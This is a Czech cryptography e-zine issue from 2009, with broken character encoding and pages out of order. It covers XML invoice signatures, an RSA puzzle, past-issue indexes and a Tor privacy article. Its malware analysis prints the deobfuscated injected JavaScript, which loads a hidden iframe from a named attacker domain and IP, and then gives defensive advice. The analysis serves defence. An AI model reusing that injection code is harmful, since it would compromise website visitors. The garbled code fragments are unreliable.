naacutesledně aplikovaacuten elektronickyacute podpis zvolenou metodou v drtiveacute většině se použiacutevaacute algoritmus RSA a vyacutesledek je uložen do elementu ltSignatureValuegt Aby přiacutejemce měl vždy po ruce veřejnyacute kliacuteč podepisujiacuteciacute osoby je jako třetiacute element přidaacutena binaacuterniacute reprezentace jeho certifikaacutetu a to do jednoho z podelementů elementu ltKeyInfogt

Poznaacutemka od 112010 je podle světovyacutech doporučeniacute zapovězeno v systeacutemech veřejneacute spraacutevy v ČR použiacutevaacuteniacute digitaacutelniacutech otisků algoritmem SHA1 a je nutno přejiacutet na některyacute vyššiacute algoritmus z rodiny SHA2 napřiacuteklad SHA256 Pracovniacute skupina SPIS na tomto probleacutemu aktuaacutelně pracuje

Konkreacutetniacute provedeniacute podpisu v XML souboru faktury by mohlo po určiteacutem zjednodušeniacute a naformaacutetovaacuteniacute vypadat např takto

ltxml version=10 encoding=utf-8gt ltInvoice xmlns=httpisdoccznamespaceinvoice version=51gt lt--helliphelliphelliphelliphelliphellip--gt ltmdashpoložky dokumentu faktura--gt lt--helliphelliphelliphelliphelliphellip--gt ltPaymentMeansgt ltmdashposledni element nepodepsane faktury- --gt ltPaymentMeansgt

Crypto-World 62009

17

ltSignature xmlns=httpwwww3org200009xmldsi ggt ltSignedInfogt

ltCanonicalizationMethod Algorithm=httpwwww3or gTR2001REC-xml- c14n-20010315gt ltSignatureMethod Algorithm=httpwwww3org2000 09xmldsigrsa- sha1gt

ltReference URI=gt ltTransformsgt

ltTransform Algorithm=httpwwww3org200009xml dsigenveloped-signaturegt

ltTransformsgt ltDigestMethod Algorithm=httpwwww3org2000 09xmldsigsha1gt ltDigestValuegt29hg161shG5T0cuwyUEQZiHmn4=ltDiges tValuegt ltReferencegt ltSignedInfogt ltSignatureValuegtrJgOKTSyaGb5 atd==ltSignatureVa luegt ltKeyInfogt ltX509Datagt ltX509CertificategtMIIEVCCAz+gAKoZIhvcNAQAwaDELmak GA1UEBhMCQ1ox hellip vlastni klientskyacute certifikaacutet hellip qoF4Y1IgJ0w16ws= ltX509Certificategt ltX509Datagt ltKeyInfogt ltSignaturegt ltInvoicegt

Podpora formaacutetu v jednotlivyacutech ISERP V době psaniacute tohoto člaacutenku (červen 2009) ještě neniacute možneacute hodnotit uacuteroveň implementace v jednotlivyacutech IS protože většina vyacuterobců jiacute plaacutenuje až do podzimniacutech nebo zimniacutech legislativniacutech verziacute Nepochybně bude velmi zajiacutemaveacute porovnat jak jednotliviacute vyacuterobci k implementaci formaacutetu ISDOC ve svyacutech systeacutemech přistoupili Ať to ale provedou tak či onak důležiteacute je že fakturu nebude v systeacutemu přiacutejemce třeba znovu typovat a že položky budou automaticky (nebo alespoň poloautomaticky) rozeznaacuteny V tom se skryacutevaacute siacutela celeacuteho řešeniacute na straně přiacutejemce

Podpora formaacutetu externiacutemi naacutestroji Pro uacutečely podpory průmysloveacuteho nasazeniacute formaacutetu ISDOC již existujiacute i externiacute naacutestroje Jeden z nich vyvinula firma ABRA Software a pojmenovala jej ISDOCReader Jde o freeware tj program kteryacute je možneacute kdykoliv staacutehnout z přiacuteslušneacute adresy (wwwisdocorg) a začiacutet jej volně použiacutevat Tento naacutestroj provede po instalaci asociaci s oběma variantami formaacutetu ISDOC (isdoc i isdocx) a stane se tak vyacutechoziacutem prohliacutežečem tohoto formaacutetu ISDOCReader dovoluje libovolnyacute fakturačniacute doklad zobrazit do vizuaacutelniacute podoby faktury ověřit přiacuteslušnyacutem tlačiacutetkem elektronickyacute podpis dokladu přiacutepadně si doklad i vytisknout Je takeacute možneacute prohliacutežet a exportovat přiacutepadneacute přiacutelohy faktury Dalšiacutem krokem bdquoworkflowldquo zpracovaacuteniacute došleacute elektronickeacute faktury v menšiacute firmě je pak jejiacute postoupeniacute k automatickeacutemu či poloautomatickeacutemu zpracovaacuteniacute do ISERP přiacutejemce k čemuž je opět přiacuteslušneacute tlačiacutetko Technicky bude možnost odeslaacuteniacute dokladu do libovolneacuteho ISERP vyřešena pomociacute konfiguračniacuteho souboru kteryacute si každyacute vyacuterobce bude moci daacutet do sveacute instalace a kteryacute ISDOCReader bude volat

Crypto-World 62009

18

Přiacuteklad použitiacute freewaroveacuteho naacutestroje ISDOCReader na ověřeniacute elpodpisu

Pokud se některyacute z laskavyacutech čtenaacuteřů bude zajiacutemat o projekt ISDOC podrobněji dalšiacute informace včetně posledniacute verze formaacutetu dokumentace jeho datovyacutech struktur přiacutekladů datovyacutech souborů i aktuaacutelniacutech uacutedajů o podpoře formaacutetu jednotlivyacutemi vyacuterobci software nalezne na adrese wwwisdoccz Literatura

[1] Kolektiv autorů Dokumentace ke standardu UBL 20 [online] Dostupnyacute z WWW lthttpdocsoasis-openorgublcs-UBL-20UBL-20htmlgt

[2] Kosek Jiřiacute XML scheacutemata [online] Dostupnyacute z WWW lthttpwwwkosekczxmlschemawxshtmlgt

[3] Kolektiv autorů XSD Schema tutorial [online] Dostupnyacute z WWW lthttpwwww3schoolscomschemadefaultaspgt

[4] Kolektiv autorů sdruženiacute W3c Dokumentace ke Xmldsig [online] Dostupnyacute z WWW lthttpwwww3orgTRxmldsig-coregt

[5] Kolektiv autorů Pracovniacute skupiny pro elektronickou fakturaci SPIS Dokumentace k formaacutetu ISDOC [online] Dostupnyacute z WWW lthttpwwwisdocczgt

Crypto-World 62009

19

D Malaacute soutěž v luštěniacute RSA Pavel Vondruška (pavelvondruskacrypto-worldinfo)

Pro přiacuteznivce našich podzimniacutech soutěžiacute v luštěniacute ale samozřejmě i dalšiacute čtenaacuteře jsem připravil naacutesledujiacuteciacute drobnou uacutelohu Soutěžniacutem uacutekolem je rozluštěniacute šifroveacuteho textu 14 39 07 57 18 34 10 47 17 92 06 31 28 65 32 92 11 41 26 31 26 29 20 80 25 06 00 77 03 60 09 00 03 60 11 44 31 00 05 41 07 92 06 16 04 70 10 75 03 60 18 79 00 46 26 73 23 49 25 18 13 90 K zašifrovaacuteniacute otevřeneacuteho textu byl použit algoritmus RSA a formaacutetovaacuteniacute CW10 (detaily viz naacutepověda) veřejnyacute kliacuteč je (Ne)=(3337 79)

Při luštěniacute se řešitel seznaacutemiacute s algoritmem RSA a uvědomiacute si jak uacutezce souvisiacute bezpečnost algoritmu s modulem N Pro prveacute dva řešitele je připravena odměna V přiacutepadě zaacutejmu se mohou bezplatně zuacutečastnit kurzu Problematika infrastruktury veřejnyacutech kliacutečů (PKI)ldquo kterou 2562009 pořaacutedaacute akademie CZNIC (httpwwwnicczakademiecourse15detail) Lektorem kurzu je PVondruška Svaacute řešeniacute zasiacutelejte na adresu pavelvondruskacrypto-worldinfo Řešeniacute uacutelohy a jmeacutena všech uacutespěšnyacutech luštitelů budou zveřejněna v letniacutem dvojčiacutesle e-zinu Crypto-World 7-82009 kteryacute vyjde 182009 Z tohoto důvodu společně s řešeniacutem zašlete souhlas se zveřejněniacutem sveacuteho jmeacutena resp nickpseudonym kteryacute může byacutet miacutesto něj zveřejněn Přeji pěknou zaacutebavu

Doplňujiacuteciacute informace k soutěžniacute uacuteloze

1 Použityacute šifrovaciacute algoritmus

V podstatě se jednaacute o klasickyacute šifrovaciacute algoritmus založenyacute na RSA kde však otevřenyacute text neniacute formaacutetovaacuten podle PKCS 1 (verze 152021) ale podle naacutemi zadanyacutech pravidel kteraacute označiacuteme jako CW 10 2 Asymetrickyacute algoritmus RSA

Zvoliacuteme prvočiacutesla p a q a vypočteme N = pq

Φ(N) = (p-1)(q-1)

Daacutele zvoliacuteme naacutehodneacute čiacuteslo e kde

Crypto-World 62009

20

1 lt e lt Φ(N) takoveacute že e a Φ(N) jsou nesoudělnaacute

Vypočteme čiacuteslo d takoveacute že

1 lt d lt Φ(N) a

ed equiv 1 mod Φ(N)

Dvojici (Nd) nazveme soukromyacute kliacuteč a (Ne) veřejnyacute kliacuteč

3 Formaacutetovaacuteniacute zpraacutevy (CW10)

Zpraacutevu M překoacutedujeme nejprve do čiacuteselneacuteho tvaru K tomu použijeme některou vhodnou převodovou tabulku Např tuto tabulku

0 1 2 3 4 5 6 7 8 9 6 0 Mezera 2 3 4 A B C D E 7 F G H I J K L M N O 8 P Q R S T U V W X Y 9 Z 1 2 3 4 5 6 7 8 9 Zpraacutevu M pak zformaacutetujeme do posloupnosti čiacutesel pevneacute deacutelky (deacutelka bude rovna deacutelce modulu N) K tomu použijeme vlastniacute formaacutetovaacuteniacute kteraacute pracovně nazveme CW10 Formaacutetovaacuteniacute CW10 1) Maacute-li modul deacutelku k budeme zpraacutevu převedenou podle tabulky dělit na skupiny deacutelky k-1 2) Všechny skupiny musiacute miacutet deacutelku k-1 nemaacute-li proto posledniacute skupina tuto deacutelku doplniacuteme

ji zprava přiacuteslušnyacutem počtem nul 3) Všechny ziacuteskaneacute skupiny nyniacute doplniacuteme zleva jednou nulou Deacutelka každeacute skupiny je po

těchto uacutepravaacutech rovna k 4) Vyacutesledek po šifrovaacuteniacute maacute deacutelku rovnou maximaacutelně k nemaacute-li ji doplniacuteme vyacutesledek zleva

nulami Ziacuteskanyacute vyacutesledek po formaacutetovaacuteniacute M označme M= m1 m2 m3 hellip 4 Zašifrovaacuteniacute zpraacutevy M

Zašifrovaacuteniacutem zpraacutevy M pomociacute veřejneacuteho kliacuteče (Ne) rozumiacuteme řetězec

P = C1 C2 C3 kde

C1 equiv m1e mod N C2 equiv m2

e mod N C3 equiv m3e mod N Ci equiv mi

e mod N

5 Dešifrovaacuteniacute zpraacutevy P

Dešifrovaacuteniacute zpraacutevy P se pak provede tak že použijeme soukromyacute exponent d a tiacutem ziacuteskaacuteme původniacute zpraacutevu M

m1 equiv C1d mod N m2 equiv C2

d mod N m3 equiv C3d mod N mi equiv Cid mod N

6 Bezpečnost Pokud dokaacuteže přiacutejemce udržet svůj soukromyacute kliacuteč v tajnosti (a čiacutesla p a q byla dostatečně velkaacute) pak je ze znalosti šifroveacute zpraacutevy a veřejneacuteho kliacuteče vyacutepočetně složiteacute ziacuteskat otevřenou zpraacutevu

Crypto-World 62009

21

E O čem jsme psali v červnu 2000 ndash 2008 Crypto-World 62000 A Novaacute evropskaacute iniciativa v oblasti kryptografie (JPinkava) 2 B Fermatův test primality Carmichaelova čiacutesla bezčtvercovaacute čiacutesla (PVondruška)3 -5 C Červ LOVE-LETTER-FOR-YOUTXTVBS (PVondruška) 6-8 D EUROCRYPT 2000 (PVondruška) 9-11 E Code Talkers (IIIdiacutel) (PVondruška) 12-14 F Letem šifrovyacutem světem 15 G Zaacutevěrečneacute informace 16 Přiacuteloha Navajo Code Talkers revize z 1561945 soubor Dictionaryhtm

Crypto-World 62001 A Zaacutehadnaacute paacuteska z Prahy IIdiacutel (PVondruška JJanečko) 2- 6 B Radioaktivniacute rozpad a kryptografickeacute kliacuteče (LSmoliacutek) 7-9 C Kryptografie a normy diacutel 8 - Normy IETF - SMIME (J Pinkava) 10-13 D Počiacutetačovyacute kurs Lidovyacutech novin (PVondruška) 14-15 E Security and Protection of Information (D Cvrček) 16 F Praacutevniacute odpovědnost poskytovatelů (JMatejka) 17-23 G Ukončeniacute platnosti zneplatněniacute (a zrušeniacute) certifikaacutetu IIdiacutel (JProkeš) 24-25 H Letem šifrovyacutem světem 26-27 I Zaacutevěrečneacute informace 28 Přiacuteloha priloha6zip (fotografie Security 2001 teacutemata přednaacutešek na konferenci Eurocryptacute2001)

Crypto-World 62002 A Historie a statistika Crypto-Worldu (PVondruška) 2-4 B Digitaacutelniacute certifikaacutety IETF-PKIX čaacutest 4 (JPinkava) 5-8 C Bezpečnost informačniacuteho systeacutemu pro certifikačniacute služby (ISCS)

a objektovaacute bezpečnost (PVondruška) 9-16 D Informace - Cryptology ePrint Archive (VKliacutema) 17 E Letem šifrovyacutem světem 18-19

1 Kritika člaacutenku Je 1024-bitovaacute deacutelka kliacuteče RSA dostatečnaacute (Crypto-World 52002)

2 Zaacutekon o elektronickeacutem podpisu novelizovaacuten - Zaacutekon č 2262002 Sb 3 Hackeři pomozte 4 O čem jsme psali v červnu 2000 a 2001

F Zaacutevěrečneacute informace 20

Crypto-World 62003 A Nebezpečiacute internetovyacutech řešeniacute (MKuchař) 2-6 B Digitaacutelniacute certifikaacutety IETF-PKIX čaacutest 13

Atributoveacute certifikaacutety ndash diacutel 2 (JPinkava) 7-10 C Kryptografickeacute protokoly s nulovyacutem předaacuteniacutem znalostiacute(JPinkava) 11-12 D Elektronickeacute peniacuteze (PVondruška) 13-20 E Letem šifrovyacutem světem 21-23 F Zaacutevěrečneacute informace 24

Crypto-World 62009

22

Crypto-World 62004 A Měsiacutec prvočiacutesel (PVondruška) 2-5 B Statistickyacute rozbor největšiacuteho prvočiacutesla (PTesař) 6-7 C Program STORK - vstupniacute dokumenty přiacuteprava (E-CRYPT) čaacutest 2 (JPinkava) 8-16 D Letem šifrovyacutem světem 17-18 E Zaacutevěrečneacute informace 19

Crypto-World 62005 A Informace pro čtenaacuteře a autory (PVondruška) 2-3 B Kontrola certifikačniacute cesty čaacutest 1 (P Rybaacuter) 4-11 C O neziacuteskateľnosti rodneacuteho čiacutesla z jeho hashu (M Pivoluska) 12-13 D Přehledovaacute zpraacuteva o vyacuteznamnyacutech publikaciacutech a projektech na teacutema

poskytovaacuteniacute anonymity klasifikace a měřitelnost informačniacuteho soukromiacute (privacy) čaacutest 2 (M Kumpošt) 14-17

E Kryptografickeacute eskalačniacute protokoly čaacutest 1 (J Krhovjaacutek) 18-21 F Recenze knihy Jon Erickson Hacking - uměniacute exploitace 22 G O čem jsme psali v červnu 2000-2004 23 H Zaacutevěrečneacute informace 24

Crypto-World 62006 A PKI roaming (L Dostaacutelek) 2-4 B Vyhlaacuteška o podrobnostech atestačniacuteho řiacutezeniacute pro elektronickeacute naacutestroje

a lehkyacute uacutevod do časoveacute synchronizace (P Vondruška) 5-9 C Univerzaacutelniacute posilovače hašovaciacutech funkciacute včetně MD5 a SHA1

aneb zaacutechranneacute kolo pro zoufalce (V Kliacutema) 10-14 D NIST (National Institute of Standards and Technology - USA) a kryptografie Recommendation on Key Management ndash čaacutest 2

(J Pinkava) 15-18 E O čem jsme psali v červnu 1999-2005 19-20 F Zaacutevěrečneacute informace 21

Crypto-World 62007 A Přehled a historie polyalfabetickyacutech šifer (PVondruška) 2-11 B Matematizace komplexniacute bezpečnosti v ČR čaacutest I (JHrubyacute) 12-20 C Mikulaacutešskaacute kryptobesiacutedka Call for Papers 21 D O čem jsme psali v červnu 2000-2006 22-23 E Zaacutevěrečneacute informace 24 Přiacuteloha Mikulaacutešskaacute kryptobesiacutedka (6-7122007)- MKB2007_CallForPapers_cervenpdf

Crypto-World 62008 A RFID Co to vlastně maacuteme v kapse (MHlavaacuteč TRosa) 2 - 17 B Bezpečnost PHP aplikaciacute (JVraacutena) 18 - 22 C Popis šifrovaciacuteho algoritmu Serpent (JJeřaacutebek) 24 - 29 D O čem jsme psali v červnu 2000-2007 30 ndash 31 E Zaacutevěrečneacute informace 32

Crypto-World 62009

23

F Zaacutevěrečneacute informace 1 Sešit Crypto-World je oficiaacutelniacute informačniacute sešit Kryptologickeacute sekce Jednoty českyacutech matematiků a fyziků (GCUCMP) Obsahuje člaacutenky podepsaneacute autory Přiacutepadneacute chyby a nepřesnosti jsou diacutelem PVondrušky a autorů jednotlivyacutech podepsanyacutech člaacutenků GCUCMP za ně nemaacute odbornou ani jinou zodpovědnost Adresa URL na niacutež můžete najiacutet tento sešit (zpravidla 3 tyacutedny po jeho rozeslaacuteniacute) a předchoziacute sešity GCUCMP denně aktualizovaneacute novinky z kryptologie a informačniacute bezpečnosti normy standardy straacutenky některyacutech členů a dalšiacute souvisejiacuteciacute materiaacutely httpcrypto-worldinfo 2 Registrace zrušeniacute registrace Zaacutejemci o e-zin se mohou zaregistrovat pomociacute e-mailu na adrese pavelvondruskacrypto-worldinfo (předmět Crypto-World) nebo použiacutet k odeslaacuteniacute žaacutedosti o registraci elektronickyacute formulaacuteř na httpcrypto-worldinfo Při registraci vyžadujeme pouze jmeacuteno a přiacutejmeniacute titul pracoviště (neniacute podmiacutenkou) a e-mail adresu určenou k zasiacutelaacuteniacute koacutedů ke staženiacute sešitu Ke zrušeniacute registrace stačiacute zaslat kraacutetkou zpraacutevu na e-mail pavelvondruskacrypto-worldinfo (předmět rušiacutem odběr Crypto-Worldu) nebo opět použiacutet formulaacuteř na httpcrypto-worldinfo Ve zpraacutevě prosiacutem uveďte jmeacuteno a přiacutejmeniacute a e-mail adresu na kterou byly koacutedy zasiacutelaacuteny 3 Redakce

E-zin Crypto-World Redakčniacute praacutece Pavel Vondruška Staacuteliacute přispěvateleacute Pavel Vondruška Jaroslav Pinkava Jazykovaacute uacuteprava Jakub Vraacutena Přehled autorů httpcrypto-worldinfoobsahautoripdf NEWS Vlastimil Kliacutema (vyacuteběr přiacutespěvků Jaroslav Pinkava komentaacuteře a Tomaacuteš Rosa vklaacutedaacuteniacute na web) Pavel Vondruška Webmaster Pavel Vondruška jr 4 Spojeniacute (abecedně) redakce e-zinu ezincrypto-worldinfo httpcrypto-worldinfo Vlastimil Kliacutema vklimavolnycz httpcryptographyhyperlinkcz Jaroslav Pinkava JaroslavPinkavazonercz httpcrypto-worldinfopinkava Tomaacuteš Rosa t_rosavolnycz httpcryptohyperlinkcz Pavel Vondruška pavelvondruskacrypto-worldinfo httpcrypto-worldinfovondruskaindexphp Pavel Vondruškajr pavelcrypto-worldinfo httpwebdesigncrypto-worldinfo Jakub Vraacutena jakubvranacz httpwwwvranacz

Page 4: Sešit 6/2009 (452 kB)

Crypto-World 62009

4

Niacuteže koacuted jsem nebyl schopen rozluštit bez spuštěniacute v chraacuteněneacutem prostřediacute (Sandbox) var xwjC=bDg4(tIu6Ye) bAhY=unescape(bAhY) lt- v bAhY je nyniacute uložen obfuskovanyacute koacuted v binaacuterniacute podobě for(var lJQZh=0 lJQZh lt (bAhYlength) lJQZh++) var bFKWW=dsWV7(tIu6YexF7S)^dsWV7(xwjCr6bZl) var uF0=dsWV7(bAhYlJQZh) xF7S++r6bZl++ k4Rca+=StringfromCharCode(uF0^bFKWW) if(r6bZlgtxwjClength)r6bZl=0 if(xF7SgttIu6Yelength)xF7S=0 Jako kliacuteč k dešifrovaacuteniacute se použiacutevaacute kliacuteč bFKWW kteryacute je ziacuteskaacuten jako XOR znaků ziacuteskanyacutech z prostřediacute v průběhu vykonaacutevaacuteniacute javascriptu Otevřenyacute text je poteacute ziacuteskaacuten jako šifrovanyacute text XOR kliacuteč Metoda šifrovaacuteniacute nebyla hlavniacutem ciacutelem paacutetraacuteniacute je to pouze zajiacutemavost nebo překaacutežka kterou je třeba překonat Daacutel už se bez znalosti prostřediacute ve ktereacutem je javascript spuštěn nedalo pokračovat Na řadu přišel experiment v chraacuteněneacute laboratoři Vlastniacute skrytyacute koacuted Javscript jsem krokoval v Microsoft Script Editoru a po chviacuteli jsem ziacuteskal teď již kompletniacute koacuted function ascgpELkf() ascgpELkfprototype = getFrameURL function() var dlh=documentlocationhost return http+ + ((dlh == || dlh == undefined) thisgetRandString() ) + dlhreplace ([^a-z0-9-])replace (+) + + thisgetRandString() + + thispath + thishost hostqqcn pathf+q+StringfromCharCode(119)+e+r+new String(z)+StringfromCharCode(46)+new String(c)+new String(n) (uveden v [13] přiacuteloze 3 - bdquoVloženyacute Javascript ndash škodlivyacute koacutedldquo) Celeacute toto sloužiacute k instalaci koacutedu ze straacutenek uacutetočniacuteka anebo k vloženiacute naacutesledujiacuteciacuteho koacutedu do dokumentu kteryacute se vykonaacute při zobrazeniacute straacutenky Vloženyacute koacuted do straacutenky je naacutesledujiacuteciacute ltdiv style=displaynonegtltiframe src=httpAAXXXYczb7d4677a720fcd24fqwerzcnqqcngt ltiframegtltdivgt AAAXXXCZ je URL ze ktereacute byla tato straacutenka volaacutena b7d4677a720fcd24 je naacutehodneacute čiacuteslo Pokud se skript vykonaacute pak uacutetočniacutekovi na domeacuteně fqwerzcn (IP 21211718534) je odeslaacuten naacutesledujiacuteciacute HTTP požadavek GET qqcn HTTP11 Accept imagegif imagex-xbitmap imagejpeg imagepjpeg applicationx-shockwave-flash Referer httpAAXXXYcztesthtml Accept-Language en-us Accept-Encoding gzip deflate User-Agent Mozilla40 (compatible MSIE 60 Windows NT 51 SV1) Host AAXXXYczb7d4677a720fcd24fqwerzcn Connection Keep-Alive

Crypto-World 62009

5

Vyacutepis z whois pro IP adresu 21211718534 inetnum 2121171850 - 212117185255 netname RUSTELEKOM descr Rustelekom LLC country RU Analyacuteza malware Pokud fqwerzcnqqcn otevřete pak se Vaacutem do počiacutetače staacutehne vcelku slušneacute množstviacute havěti Zajiacutemaveacute na straacutence uacutetočniacuteka je že je zde implementovaacuten mechanizmus sledovaacuteniacute kdo jakeacute přiacutekazy posiacutelaacute a zdaacute se že maacute oběť dva pokusy na ziacuteskaacuteniacute infekce Poteacute dojde na nějakyacute čas k zablokovaacuteniacute pravděpodobně IP adresy Je možneacute že se takto uacutetočniacutek braacuteniacute analyacuteze provozu nebo se pouze snažiacute šetřit siacuteťovyacute provoz Bohužel toto velmi znesnadňuje analyacutezu a opakovaacuteniacute pokusu Po otevřeniacute ve virtuaacutelniacute laboratoři stouplo vytiacuteženiacute procesoru laboratoře na 100 a do dvou minut laboratoř havarovala se zobrazeniacutem modreacuteho šetřiče obrazovky Poteacute jsem již stanici nespouštěl do Windows ale provedl jsem boot do dřiacuteve volně dostupneacuteho naacutestroje pro forenzniacute analyacutezu ndash Helix CD Vytvořil jsem MD5 hash (odborniacuteci prominou) všech souborů na disku a dal se do zjišťovaacuteniacute změn porovnaacuteniacutem originaacutelniacutech souborů se změněnyacutemi Každyacute zjištěnyacute přidanyacute nebo změněnyacute soubor jsem nahraacutel na virustotalcom abych zjistil jak se k němu postaviacute jednotliveacute antiviroveacute systeacutemy Vyacutesledky jsou vcelku zajiacutemaveacute doporučuji je shleacutednout v [13] přiacuteloze 4 ndash bdquoVyacutesledky antivirovyacutech kontrolldquo

Zdroj infekce

V okamžiku kdy bylo zjištěno co danyacute javascript znamenaacute pustili jsme se s Kubou do zjištěniacute kde se vlastně na straacutenkaacutech objevil a odkud Podařilo se naacutem kontaktovat administraacutetora a ziacuteskat logy z web serveru V logu přiacutestupů jsme objevili mnoho zaacuteznamů o přihlaacutešeniacute na FTP z adres z Čiacuteny Zajiacutemavyacutem zjištěniacutem bylo že jsme našli pouze uacutespěšnaacute přihlaacutešeniacute čili uacutetočniacutek odněkud ziacuteskal platneacute uživatelskeacute jmeacuteno a heslo Paacutetrali jsme zdali existuje vir kteryacute krade hesla do FTP a našli jsme jich několik Předpoklaacutedaacuteme že počiacutetač administraacutetora straacutenek byl dřiacuteve infikovaacuten virem jehož ciacutelem bylo ziacuteskat přiacutestupy na FTP uacutečty ndash napřiacuteklad viry Virut nebo Neosploit Bohužel paacutetrat zpětně v čase jakyacute vir byl na stanici několik měsiacuteců zpět nepřineslo žaacutednyacute vyacutesledek

Poteacute jsme takeacute zjišťovali co se změnilo na FTP uacutečtu a našli jsme že pro danou domeacutenu byl do každeacuteho existujiacuteciacuteho php a js souboru vložen škodlivyacute javascript

Zaacutevěr

Po prohleacutednutiacute exploitů bych doporučil na klientskyacutech počiacutetačiacutech miacutet staacutele aktualizovaneacute Windows použiacutevat firewall zajistit nainstalovanyacute a aktuaacutelniacute antivirovyacute systeacutem s aktuaacutelniacute antivirovou databaacuteziacute při pohybu po internetu použiacutevat prohliacutežeč Firefox s nainstalovanyacutem NoScript pluginem Takteacutež bych nedoporučoval použiacutevaacuteniacute automaticky funkci pamatovaacuteniacute hesel miacutesto toho by bylo vhodneacute použiacutet password managery jako je napřiacuteklad Keepass

Crypto-World 62009

6

Z pohledu administraacutetora serveru by bylo vhodneacute aby klienti přestali použiacutevat FTP protokol pro update straacutenek a tento nahraacuteli SCP nebo FTPS Přiacutestup na server by měl byacutet omezen pouze pro nezbytně nutnyacute rozsah IP adres Rozsahy IP adres pouze pro Českou Republiku a Slovensko Kuba zveřejnil na sveacutem blogu [12] Administraacutetoři by si takteacutež měli zajistit vynuceniacute změny FTP hesla po přibližně 90-ti dnech

Odkazy

[1] Obfuscation - httpenwikipediaorgwikiObfuscated_code [2] Sandbox analyacuteza javascriptu umiacutestěneacuteho ve straacutence httpwepawetiseclaborgviewphphash=63e61b9084ca87248668eb83c9aa5742amptype=js [3] Referenčniacute přiacuteručka Javascript ndash httpsdevelopermozillaorgenCore_JavaScript_15_Reference [4] Analyacuteza javascriptů na Internet Storm Center ndash httpiscsansorgdiaryhtmlstoryid=4246 httpiscsansorgtaghtmltag=javascript [5] Microsoft Script Editor guide - httperikeaenetarchives20050704214950 [6] Českeacute a Slovenskeacute rozsahy IP adres httpwwwdrupalczblogjakub-suchyip-adresy-statu-cz-sk-rozsahy [7] Dancho Danchevs blog - httpddanchevblogspotcom [8] Informace o Neosploit httpsecurityworldczsecurityworldutocnici-ziskali-pristup-k-200-000-serverum-a-nasadili-zde-neosploit-280 [9] Neosploit - přiacutepad z Českeacute Republiky httpwwwbenczczaktualitynas-web-byl-napaden-hackerem [10] Test souborů na vyacuteskyt virů ndash httpvirustotalcom [11] Helix3 tm ndash dřiacuteve dostupnyacute na httpwwwe-fensecom [12] Suchyacute J httpwwwdrupalczblogjakub-suchyip-adresy-statu-cz-sk-rozsahy [13] Vorliacuteček J Suchyacute J Vyacuteprava za obsahem javascriptu

přiacuteloha k e-zinu Crypto-World 62009 Přiacuteloha 1 - bdquoVloženyacute Javascript ndash koacuted ve straacutenceldquo str1-6 Přiacuteloha 2 - bdquoVloženyacute Javascript ndash zdrojovyacute koacutedldquo str7-9 Přiacuteloha 3 - bdquoVloženyacute Javascript ndash škodlivyacute koacutedldquo str10-11 Přiacuteloha 4 - bdquoVyacutesledky antivirovyacutech kontrolldquo str12-24

Crypto-World 62009

7

B Anonymita v globaacutelniacute siacuteti Ing Jan Hajnyacute Uacutestav telekomunikaciacute FEKT VUT Brno (hajnyfeecvutbrcz) Abstrakt ndash Hlavniacutem ciacutelem tohoto člaacutenku je popsat současnyacute stav tyacutekajiacuteciacute se ochrany privaacutetniacutech dat při použiacutevaacuteniacute informačniacutech systeacutemů a identifikovat zaacutekladniacute prostředky pro jejich ochranu V prvniacute čaacutesti jsou zmiacuteněny hlavniacute probleacutemy při využiacutevaacuteniacute současnyacutech informačniacutech technologiiacute a hrozby ktereacute naacutem mohou přineacutest Druhaacute čaacutest člaacutenku se věnuje jednomu z prvniacutech kroků při ochraně anonymity v počiacutetačovyacutech siacutetiacutech Jednaacute se o technologii Tor poskytujiacuteciacute možnost skrytiacute identity Osobniacute data a jejich využiacutevaacuteniacute

V současneacute době již plně žijeme v informačniacute společnosti tedy společnosti založeneacute na datech a jejich přenosu zpracovaacuteniacute Teacuteměř každyacute z naacutes využiacutevaacute osobniacute počiacutetač mobilniacute telefon kreditniacute karty či smart karty pro identifikaci v různyacutech organizaciacutech a uacuteřadech Neniacute však zcela zřejmeacute jakaacute data se ve skutečnosti pomociacute těchto přiacutestrojů přenaacutešiacute a kolik mohou řiacuteci o našem chovaacuteniacute a soukromiacute Nejsou to takeacute pouze zařiacutezeniacute kteraacute vlastniacuteme a kteraacute tak můžeme přiacutemo ovlivnit Jednaacute se i o tzv bezpečnostniacute zařiacutezeniacute všude kde se pohybujeme ndash např dohledoveacute kamery ve městech skenery na letišti biometrickeacute pasy nebo různeacute slevoveacute karty obchodniacutech řetězců Všechny tyto zařiacutezeniacute mohou pracovat s našiacute identitou a my nejsme schopni přiacuteliš ovlivnit kolik informaciacute o naacutes uvolňujiacute Mnoho přiacutekladů může byacutet uvedeno např ze člaacutenků Bruce Schneiera kteryacute se problematikou ochrany identity zabyacutevaacute Ze člaacutenku zabyacutevajiacuteciacuteho se problematikou privaacutetniacutech dat [1] je jasneacute že se nejednaacute pouze o teoretickou hrozbu Přiacutekladem mohou byacutet dohledoveacute systeacutemy Jen v Londyacuteně je v současneacute době okolo 500000 dohledovyacutech kamer [2] I přesto z některyacutech vyacutezkumů vyplyacutevaacute [3] že jejich efektivita neniacute při odhalovaacuteniacute zločinů přiacuteliš vysokaacute Zatiacutemco mohou miacutet menšiacute vliv na přesunutiacute zločinnosti na jinaacute miacutesta v globaacutelnějšiacutem měřiacutetku se neprojeviacute Na druhou stranu jsou tyto systeacutemy v provozu 24 hodin denně a sniacutemajiacute všechny osoby na veřejnyacutech miacutestech S technologickyacutem vyacutevojem nejsme daleko od automatickeacuteho rozpoznaacutevaacuteniacute tvaacuteřiacute a tedy i identifikace osob na zaacuteznamech Budou o naacutes tedy znaacutema data tyacutekajiacuteciacute se našeho pohybu během dne chovaacuteniacute (např kde nakupujeme) a dokonce bude možneacute kamery zneužiacutet k ilegaacutelniacutemu sledovaacuteniacute osob v soukromyacutech bytech atd ktereacute jsou v dosahu kamer Stejně tak znaacuteme leteckeacute fotografie sloužiacuteciacute jako podklady k mapaacutem ndash dostatečně detailniacute na odhaleniacute mnoha informaciacute o soukromyacutech osobaacutech

Dalšiacutem přiacutekladem ohroženiacute identity jsou smart karty a jejich využiacutevaacuteniacute během běžneacute denniacute činnosti Neniacute složiteacute si uvědomit že někde musiacute existovat data o tom co během dne jiacuteme (zaměstnaneckeacute ID karty) nakupujeme v obchodech (kreditniacute karty) jakeacute maacuteme zvyky při naacutekupech např potravin (slevoveacutečlenskeacute karty) nebo o co se zajiacutemaacuteme (videopůjčovnyknihovny) Ve všech těchto přiacutepadech je jednoznačně spojena naše identita s našiacutem chovaacuteniacutem Vytvaacuteřiacute se tak jakyacutesi datovyacute otisk našiacute osobnosti i přesto že tyto data jsou rozprostřena u různyacutech organizaciacute a na různyacutech miacutestech

